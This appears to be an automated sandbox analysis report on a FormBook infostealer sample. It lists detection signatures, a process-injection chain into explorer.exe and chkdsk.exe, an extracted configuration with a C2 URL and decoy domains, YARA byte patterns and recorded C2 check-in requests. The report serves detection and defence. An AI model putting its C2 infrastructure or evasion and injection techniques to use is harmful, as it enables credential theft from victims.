Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
inlaww321345.exe

Overview

General Information

Sample Name:inlaww321345.exe
Analysis ID:626561
MD5:43e64e0ab6ca479c2af3afed56216a91
SHA1:983a822ffde2b558dfe2a8ac1dcc4d42df0f1d94
SHA256:cbdf1e33bc694b1ca634a4b042bd010050c9baf99078c91adf961ef92cebd305
Tags:exeformbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • inlaww321345.exe (PID: 6464 cmdline: "C:\Users\user\Desktop\inlaww321345.exe" MD5: 43E64E0AB6CA479C2AF3AFED56216A91)
    • idczzzzbpy.exe (PID: 6492 cmdline: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk MD5: 0A3F789C1F124B76E2EDC74EBEACF70A)
      • idczzzzbpy.exe (PID: 6516 cmdline: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk MD5: 0A3F789C1F124B76E2EDC74EBEACF70A)
        • explorer.exe (PID: 3968 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • chkdsk.exe (PID: 6248 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: 2D5A2497CB57C374B3AE3080FF9186FB)
            • cmd.exe (PID: 6368 cmdline: /c del "C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 1804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.boxberry-my.com/sn31/"], "decoy": ["matsuomatsuo.com", "104wn.com", "bolacorner.com", "dawonderer.com", "yourpamlano.xyz", "mtzmx.icu", "lepakzaparket.com", "barmagli.com", "danta.ltd", "marumaru240.com", "people-centeredhr.com", "test-brew-inc.com", "clairvoyantbusinesscoach.com", "aforeignexchangeblog.com", "erentekbilisim.com", "gangqinqu123.net", "defiguaranteebonds.com", "thegioigaubong97.site", "vaoiwin.info", "vcwholeness.com", "03c3twpfee5estjovfu2655.com", "mutantapeyachtclubtoken.store", "pixelkev.xyz", "corporacioncymaz.com", "iampro-found.com", "azureconsults.com", "bam-bong.com", "advanceresubeopene.biz", "tzjisheng.com", "krdz28.online", "ycw2009.com", "minioe.com", "dronelink.xyz", "autu.cfd", "sdwmkj.com", "uixray.xyz", "informacion-numero-24-h.site", "123dianyingyuan.com", "tj-assets.com", "usaservicedogregistratuon.com", "metagwnics.com", "pepeksquad2.host", "kc7.club", "yundtremark.com", "finance-employers.com", "euroglobalnews.info", "estudioenzetti.com", "rodosmail.xyz", "bm65.xyz", "bchmtn.net", "server4uuss.net", "maisonretraiteprivee.com", "atelierelzaaidar.com", "thegurlyboutique.com", "primobellaquartz.com", "jetskirentaldublin.com", "akmeetech.com", "withoutyoutube.com", "blackcreekwatershed.com", "89qp52.com", "e3488.com", "vote4menk.com", "tyma.club", "theceditpalooza.com"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18849:$sqlite3step: 68 34 1C 7B E1
    • 0x1895c:$sqlite3step: 68 34 1C 7B E1
    • 0x18878:$sqlite3text: 68 38 2A 90 C5
    • 0x1899d:$sqlite3text: 68 38 2A 90 C5
    • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
    00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 28 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.idczzzzbpy.exe.400000.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.2.idczzzzbpy.exe.400000.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.2.idczzzzbpy.exe.400000.1.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18849:$sqlite3step: 68 34 1C 7B E1
        • 0x1895c:$sqlite3step: 68 34 1C 7B E1
        • 0x18878:$sqlite3text: 68 38 2A 90 C5
        • 0x1899d:$sqlite3text: 68 38 2A 90 C5
        • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
        1.2.idczzzzbpy.exe.700000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.idczzzzbpy.exe.700000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 22 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:192.168.2.3188.114.96.1049808802031449 05/14/22-13:08:49.696707
          SID:2031449
          Source Port:49808
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.3188.114.96.1049808802031453 05/14/22-13:08:49.696707
          SID:2031453
          Source Port:49808
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.3188.114.96.1049808802031412 05/14/22-13:08:49.696707
          SID:2031412
          Source Port:49808
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.boxberry-my.com/sn31/"], "decoy": ["matsuomatsuo.com", "104wn.com", "bolacorner.com", "dawonderer.com", "yourpamlano.xyz", "mtzmx.icu", "lepakzaparket.com", "barmagli.com", "danta.ltd", "marumaru240.com", "people-centeredhr.com", "test-brew-inc.com", "clairvoyantbusinesscoach.com", "aforeignexchangeblog.com", "erentekbilisim.com", "gangqinqu123.net", "defiguaranteebonds.com", "thegioigaubong97.site", "vaoiwin.info", "vcwholeness.com", "03c3twpfee5estjovfu2655.com", "mutantapeyachtclubtoken.store", "pixelkev.xyz", "corporacioncymaz.com", "iampro-found.com", "azureconsults.com", "bam-bong.com", "advanceresubeopene.biz", "tzjisheng.com", "krdz28.online", "ycw2009.com", "minioe.com", "dronelink.xyz", "autu.cfd", "sdwmkj.com", "uixray.xyz", "informacion-numero-24-h.site", "123dianyingyuan.com", "tj-assets.com", "usaservicedogregistratuon.com", "metagwnics.com", "pepeksquad2.host", "kc7.club", "yundtremark.com", "finance-employers.com", "euroglobalnews.info", "estudioenzetti.com", "rodosmail.xyz", "bm65.xyz", "bchmtn.net", "server4uuss.net", "maisonretraiteprivee.com", "atelierelzaaidar.com", "thegurlyboutique.com", "primobellaquartz.com", "jetskirentaldublin.com", "akmeetech.com", "withoutyoutube.com", "blackcreekwatershed.com", "89qp52.com", "e3488.com", "vote4menk.com", "tyma.club", "theceditpalooza.com"]}
          Multi AV Scanner detection for submitted file
          Source: inlaww321345.exeVirustotal: Detection: 53%Perma Link
          Source: inlaww321345.exeReversingLabs: Detection: 56%
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.idczzzzbpy.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.idczzzzbpy.exe.700000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.idczzzzbpy.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.idczzzzbpy.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.idczzzzbpy.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.idczzzzbpy.exe.700000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.idczzzzbpy.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.idczzzzbpy.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.idczzzzbpy.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.246864810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.289205800.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.306971961.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.319619508.0000000001180000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.507830951.0000000000F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.251263067.0000000000700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.248745140.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.507774952.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.319548614.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: www.boxberry-my.com/sn31/Avira URL Cloud: Label: malware
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeReversingLabs: Detection: 46%
          Machine Learning detection for sample
          Source: inlaww321345.exeJoe Sandbox ML: detected
          Source: 2.0.idczzzzbpy.exe.400000.7.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.idczzzzbpy.exe.700000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.0.idczzzzbpy.exe.400000.9.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.0.idczzzzbpy.exe.400000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.2.idczzzzbpy.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: inlaww321345.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: inlaww321345.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: C:\nwmcc\xasivn\insq\a82874181cac4c8c8d839f9e6026f5f4\nkrdof\moxadzwk\Release\moxadzwk.pdb source: inlaww321345.exe, 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmp, idczzzzbpy.exe, 00000001.00000000.239867122.00000000003BE000.00000002.00000001.01000000.00000004.sdmp, idczzzzbpy.exe, 00000001.00000002.251217446.00000000003BE000.00000002.00000001.01000000.00000004.sdmp, idczzzzbpy.exe, 00000002.00000000.244915451.00000000003BE000.00000002.00000001.01000000.00000004.sdmp, chkdsk.exe, 00000010.00000002.507707421.0000000000DF5000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000002.509886446.00000000058BF000.00000004.10000000.00040000.00000000.sdmp, nsuD94B.tmp.0.dr, idczzzzbpy.exe.0.dr
          Source: Binary string: wntdll.pdbUGP source: idczzzzbpy.exe, 00000001.00000003.245625219.000000001A210000.00000004.00001000.00020000.00000000.sdmp, idczzzzbpy.exe, 00000001.00000003.242881004.000000001A080000.00000004.00001000.00020000.00000000.sdmp, idczzzzbpy.exe, 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, idczzzzbpy.exe, 00000002.00000003.251002261.0000000001304000.00000004.00000800.00020000.00000000.sdmp, idczzzzbpy.exe, 00000002.00000002.320891841.000000000175F000.00000040.00000800.00020000.00000000.sdmp, idczzzzbpy.exe, 00000002.00000003.253061392.00000000014AD000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000003.319381710.0000000005057000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000002.508832539.00000000054AF000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000002.508367712.0000000005390000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000003.321067477.00000000051F7000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: idczzzzbpy.exe, idczzzzbpy.exe, 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, idczzzzbpy.exe, 00000002.00000003.251002261.0000000001304000.00000004.00000800.00020000.00000000.sdmp, idczzzzbpy.exe, 00000002.00000002.320891841.000000000175F000.00000040.00000800.00020000.00000000.sdmp, idczzzzbpy.exe, 00000002.00000003.253061392.00000000014AD000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 00000010.00000003.319381710.0000000005057000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000002.508832539.00000000054AF000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000002.508367712.0000000005390000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000003.321067477.00000000051F7000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\inlaww321345.exeCode function: 0_2_00405D7A CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
          Source: C:\Users\user\Desktop\inlaww321345.exeCode function: 0_2_004069A4 FindFirstFileW,FindClose,
          Source: C:\Users\user\Desktop\inlaww321345.exeCode function: 0_2_0040290B FindFirstFileW,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 4x nop then pop ebx
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4x nop then pop edi

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 188.114.96.10 80
          Source: C:\Windows\explorer.exeNetwork Connect: 154.85.152.171 80
          Source: C:\Windows\explorer.exeDomain query: www.informacion-numero-24-h.site
          Source: C:\Windows\explorer.exeDomain query: www.tzjisheng.com
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49808 -> 188.114.96.10:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49808 -> 188.114.96.10:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49808 -> 188.114.96.10:80
          Performs DNS queries to domains with low reputation
          Source: DNS query: www.rodosmail.xyz
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.boxberry-my.com/sn31/
          Source: Joe Sandbox ViewASN Name: DXTL-HKDXTLTseungKwanOServiceHK DXTL-HKDXTLTseungKwanOServiceHK
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: global trafficHTTP traffic detected: GET /sn31/?3fK84j=bDKp2PCxjp9Dyht0&p6Ah=F3OPTzYh/KYNQDx4mU9pmepphtdjiinNkarquV5J38/xiILCZYJsFfYNFvKas6or25OS HTTP/1.1Host: www.informacion-numero-24-h.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sn31/?p6Ah=2a7s6yRQu5sKFClQSChidlXjlxi9pt4Q5wJ1geib+tah5K7nc27GLkEkTe4Wsszvrpha&3fK84j=bDKp2PCxjp9Dyht0 HTTP/1.1Host: www.tzjisheng.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 188.114.96.10 188.114.96.10
          Source: Joe Sandbox ViewIP Address: 188.114.96.10 188.114.96.10
          Source: inlaww321345.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: unknownDNS traffic detected: queries for: www.informacion-numero-24-h.site
          Source: global trafficHTTP traffic detected: GET /sn31/?3fK84j=bDKp2PCxjp9Dyht0&p6Ah=F3OPTzYh/KYNQDx4mU9pmepphtdjiinNkarquV5J38/xiILCZYJsFfYNFvKas6or25OS HTTP/1.1Host: www.informacion-numero-24-h.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sn31/?p6Ah=2a7s6yRQu5sKFClQSChidlXjlxi9pt4Q5wJ1geib+tah5K7nc27GLkEkTe4Wsszvrpha&3fK84j=bDKp2PCxjp9Dyht0 HTTP/1.1Host: www.tzjisheng.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Users\user\Desktop\inlaww321345.exeCode function: 0_2_0040580F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.idczzzzbpy.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.idczzzzbpy.exe.700000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.idczzzzbpy.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.idczzzzbpy.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.idczzzzbpy.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.idczzzzbpy.exe.700000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.idczzzzbpy.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.idczzzzbpy.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.idczzzzbpy.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.246864810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.289205800.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.306971961.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.319619508.0000000001180000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.507830951.0000000000F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.251263067.0000000000700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.248745140.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.507774952.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.319548614.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 2.2.idczzzzbpy.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.idczzzzbpy.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.idczzzzbpy.exe.700000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.idczzzzbpy.exe.700000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.idczzzzbpy.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.idczzzzbpy.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.idczzzzbpy.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.idczzzzbpy.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.idczzzzbpy.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.idczzzzbpy.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.idczzzzbpy.exe.700000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.idczzzzbpy.exe.700000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.idczzzzbpy.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.idczzzzbpy.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.idczzzzbpy.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.idczzzzbpy.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.idczzzzbpy.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.idczzzzbpy.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
